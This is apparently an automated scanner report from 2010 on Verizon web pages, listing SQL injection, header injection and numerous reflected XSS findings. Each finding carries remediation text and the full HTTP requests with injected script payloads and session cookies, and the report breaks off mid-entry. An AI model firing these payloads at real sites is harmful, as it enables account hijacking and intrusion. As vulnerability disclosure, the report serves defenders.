The gender parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the gender parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Issue background
SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.
Issue remediation
The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.
You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:
One common defense is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defense is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defense may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defense to be bypassed.
Another often cited defense is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://activate.verizon.net/vason ...[SNIP]...
The value of the goto request parameter is copied into the Location response header. The payload 468b3%0d%0ae6a869cb573 was submitted in the goto parameter. This caused a response containing an injected HTTP header.
Issue background
HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.
Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
Issue remediation
If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of the goto request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8af9a"%3b4024f132588 was submitted in the goto parameter. This input was echoed as 8af9a";4024f132588 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <title>Verizon | My Verizon Sign In - Online Account Management</title> ...[SNIP]... window.location.href="http://www22.verizon.com/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx?goto=https://www22.verizon.com/ForYourHome/MyAccount/Protected/Services/MyServices.aspx8af9a";4024f132588"; }
function fnSetSessionCookie(name,value,path,domain){ document.cookie=name+"="+escape(value)+((path)?";path="+path:"")+((domain)?";domain="+domain:""); } var strRemOpt=""; var strMyVzCom=f ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 923dc(a)cae14d5df3e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload c0137(a)ec58675ea9d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the _pageLabel request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 68173'-alert(1)-'ec88b63ed46 was submitted in the _pageLabel parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>Verizon Sma ...[SNIP]... hHeaderText");
The value of the serviceId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1ea0c'%3balert(1)//5fb68b88c27 was submitted in the serviceId parameter. This input was echoed as 1ea0c';alert(1)//5fb68b88c27 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the serviceType request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 248ca"><img%20src%3da%20onerror%3dalert(1)>b84734f6a04 was submitted in the serviceType parameter. This input was echoed as 248ca"><img src=a onerror=alert(1)>b84734f6a04 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b439"><script>alert(1)</script>14a07652aec was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net8b439"><script>alert(1)</script>14a07652aec/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 02:14:20 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 359 Content-Type: text/html Cache-Control: private Content-Length: 359
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ce74"><script>alert(1)</script>92b0fb76a8b was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage2ce74"><script>alert(1)</script>92b0fb76a8b/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 02:14:23 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1394 Content-Type: text/html Cache-Control: private Content-Length: 1394
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53b64"><script>alert(1)</script>22bd36ebe57 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top53b64"><script>alert(1)</script>22bd36ebe57?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 02:14:26 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 352 Content-Type: text/html Cache-Control: private Content-Length: 352
The value of the audio_conf request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbd15"><script>alert(1)</script>e9b1c6ac9bf was submitted in the audio_conf parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=fbd15"><script>alert(1)</script>e9b1c6ac9bf&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 02:13:48 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1394 Content-Type: text/html Cache-Control: private Content-Length: 1394
The value of the bbaw request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b04e9"><script>alert(1)</script>88b43b9e841 was submitted in the bbaw parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=b04e9"><script>alert(1)</script>88b43b9e841&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 02:13:58 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1394 Content-Type: text/html Cache-Control: private Content-Length: 1394
The value of the connex request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95f66"><script>alert(1)</script>944d611ec25 was submitted in the connex parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=95f66"><script>alert(1)</script>944d611ec25&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 02:13:08 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1394 Content-Type: text/html Cache-Control: private Content-Length: 1394
The value of the fiostvown request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc55a"><script>alert(1)</script>061e019d33 was submitted in the fiostvown parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=dc55a"><script>alert(1)</script>061e019d33&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 02:13:17 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1392 Content-Type: text/html Cache-Control: private Content-Length: 1392
The value of the fiosvoice request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12655"><script>alert(1)</script>19403df38df was submitted in the fiosvoice parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=12655"><script>alert(1)</script>19403df38df&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 02:13:19 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1394 Content-Type: text/html Cache-Control: private Content-Length: 1394
The value of the msp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2d52"><script>alert(1)</script>08e01549957 was submitted in the msp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=c2d52"><script>alert(1)</script>08e01549957&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 02:13:28 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1394 Content-Type: text/html Cache-Control: private Content-Length: 1394
3.16. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 198e7"><script>alert(1)</script>2bc9a424ec6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=&198e7"><script>alert(1)</script>2bc9a424ec6=1 HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 02:14:07 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1402 Content-Type: text/html Cache-Control: private Content-Length: 1402
The value of the npa request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4037b"><script>alert(1)</script>d2c2ef8cfb7 was submitted in the npa parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=4037b"><script>alert(1)</script>d2c2ef8cfb7&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 02:13:23 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1396 Content-Type: text/html Cache-Control: private Content-Length: 1396
The value of the nxx request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14c09"><script>alert(1)</script>9bf55b7778c was submitted in the nxx parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
